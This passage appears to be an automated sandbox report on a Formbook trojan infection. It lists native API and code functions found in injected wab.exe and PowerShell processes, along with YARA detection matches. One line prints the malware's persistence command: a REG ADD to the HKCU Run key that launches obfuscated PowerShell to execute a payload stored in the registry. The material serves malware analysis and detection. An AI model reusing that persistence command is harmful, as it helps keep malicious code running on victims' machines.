              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004017B7 NtdllDefWindowProc_A,18_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC35C0 NtCreateMutant,LdrInitializeThunk,26_2_21CC35C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2B60 NtClose,LdrInitializeThunk,26_2_21CC2B60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,26_2_21CC2DF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,26_2_21CC2C70
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC3090 NtSetValueKey,26_2_21CC3090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC3010 NtOpenDirectoryObject,26_2_21CC3010
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC4340 NtSetContextThread,26_2_21CC4340
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC4650 NtSuspendThread,26_2_21CC4650
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC39B0 NtGetContextThread,26_2_21CC39B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2BE0 NtQueryValueKey,26_2_21CC2BE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2BF0 NtAllocateVirtualMemory,26_2_21CC2BF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2B80 NtQueryInformationFile,26_2_21CC2B80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2BA0 NtEnumerateValueKey,26_2_21CC2BA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2AD0 NtReadFile,26_2_21CC2AD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2AF0 NtWriteFile,26_2_21CC2AF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2AB0 NtWaitForSingleObject,26_2_21CC2AB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2DD0 NtDelayExecution,26_2_21CC2DD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2DB0 NtEnumerateKey,26_2_21CC2DB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC3D70 NtOpenThread,26_2_21CC3D70
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2D00 NtSetInformationFile,26_2_21CC2D00
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC3D10 NtOpenProcessToken,26_2_21CC3D10
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2D10 NtMapViewOfSection,26_2_21CC2D10
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2D30 NtUnmapViewOfSection,26_2_21CC2D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2CC0 NtQueryVirtualMemory,26_2_21CC2CC0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2CF0 NtOpenProcess,26_2_21CC2CF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2CA0 NtQueryInformationToken,26_2_21CC2CA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2C60 NtCreateKey,26_2_21CC2C60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2C00 NtQueryInformationProcess,26_2_21CC2C00
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2FE0 NtCreateFile,26_2_21CC2FE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2F90 NtProtectVirtualMemory,26_2_21CC2F90
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2FA0 NtQuerySection,26_2_21CC2FA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2FB0 NtResumeThread,26_2_21CC2FB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2F60 NtCreateProcessEx,26_2_21CC2F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2F30 NtCreateSection,26_2_21CC2F30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2EE0 NtQueueApcThread,26_2_21CC2EE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2E80 NtReadVirtualMemory,26_2_21CC2E80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2EA0 NtAdjustPrivilegesToken,26_2_21CC2EA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC2E30 NtWriteVirtualMemory,26_2_21CC2E30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B70BE922_2_00007FFD9B70BE92
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B70B0E62_2_00007FFD9B70B0E6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B706E6D2_2_00007FFD9B706E6D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0468EF685_2_0468EF68
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0468F8385_2_0468F838
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0468EC205_2_0468EC20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0747C9985_2_0747C998
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D7B5C110_2_23D7B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D8719410_2_23D87194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044B04017_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043610D17_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044731017_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A49017_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040755A17_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043C56017_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044B61017_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044D6C017_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004476F017_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044B87017_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044081D17_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041495717_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004079EE17_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00407AEB17_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044AA8017_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00412AA917_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00404B7417_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00404B0317_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044BBD817_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00404BE517_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00404C7617_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00415CFE17_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00416D7217_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00446D3017_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00446D8B17_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406E8F17_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040503818_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0041208C18_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004050A918_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040511A18_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0043C13A18_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004051AB18_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044930018_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040D32218_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044A4F018_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0043A5AB18_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0041363118_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044669018_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044A73018_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004398D818_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004498E018_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044A88618_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0043DA0918_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00438D5E18_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00449ED018_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0041FE8318_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00430F5418_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004050C219_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004014AB19_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040513319_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004051A419_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040124619_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040CA4619_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040523519_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004032C819_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040168919_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00402F6019_2_00402F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0482F48820_2_0482F488
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0482F14020_2_0482F140
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D481CC26_2_21D481CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9B1B026_2_21C9B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D501AA26_2_21D501AA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D1815826_2_21D18158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC516C26_2_21CC516C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F17226_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D5B16B26_2_21D5B16B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8010026_2_21C80100
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A11826_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C026_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F0CC26_2_21D3F0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4F0E026_2_21D4F0E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D470E926_2_21D470E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D503E626_2_21D503E6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F026_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD739A26_2_21CD739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D34C26_2_21C7D34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4132D26_2_21D4132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C026_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A026_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3027426_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D5059126_2_21D50591
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2D5B026_2_21D2D5B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4757126_2_21D47571
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9053526_2_21C90535
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3E4F626_2_21D3E4F6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4244626_2_21D42446
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8146026_2_21C81460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4F43F26_2_21D4F43F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C817EC26_2_21C817EC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4F7B026_2_21D4F7B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB475026_2_21CB4750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9077026_2_21C90770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D416CC26_2_21D416CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAC6E026_2_21CAC6E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9599026_2_21C95990
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C929A026_2_21C929A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D5A9A626_2_21D5A9A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9995026_2_21C99950
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB95026_2_21CAB950
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA696226_2_21CA6962
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C938E026_2_21C938E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE8F026_2_21CBE8F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C768B826_2_21C768B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9284026_2_21C92840
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9A84026_2_21C9A840
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD80026_2_21CFD800
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D46BD726_2_21D46BD7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D05BF026_2_21D05BF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CCDBF926_2_21CCDBF9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4AB4026_2_21D4AB40
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3DAC626_2_21D3DAC6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8EA8026_2_21C8EA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD5AA026_2_21CD5AA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2DAAC26_2_21D2DAAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D47A4626_2_21D47A46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4FA4926_2_21D4FA49
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D03A6C26_2_21D03A6C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAFDC026_2_21CAFDC0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8ADE026_2_21C8ADE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA8DBF26_2_21CA8DBF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D41D5A26_2_21D41D5A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D47D7326_2_21D47D73
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9AD0026_2_21C9AD00
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4FCF226_2_21D4FCF2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C80CF226_2_21C80CF2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30CB526_2_21D30CB5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9EC6026_2_21C9EC60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82FC826_2_21C82FC8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C91F9226_2_21C91F92
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4FFB126_2_21D4FFB1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0EFA026_2_21D0EFA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D04F4026_2_21D04F40
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4FF0926_2_21D4FF09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD2F2826_2_21CD2F28
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB0F3026_2_21CB0F30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4EEDB26_2_21D4EEDB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4CE9326_2_21D4CE93
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA2E9026_2_21CA2E90
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C99EB026_2_21C99EB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C90E5B26_2_21C90E5B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4EE2626_2_21D4EE26
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21CD7E54 appears 88 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21C7B970 appears 220 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21CC5130 appears 34 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21CFEA12 appears 81 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21D0F290 appears 98 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: amsi32_7860.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_8084.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
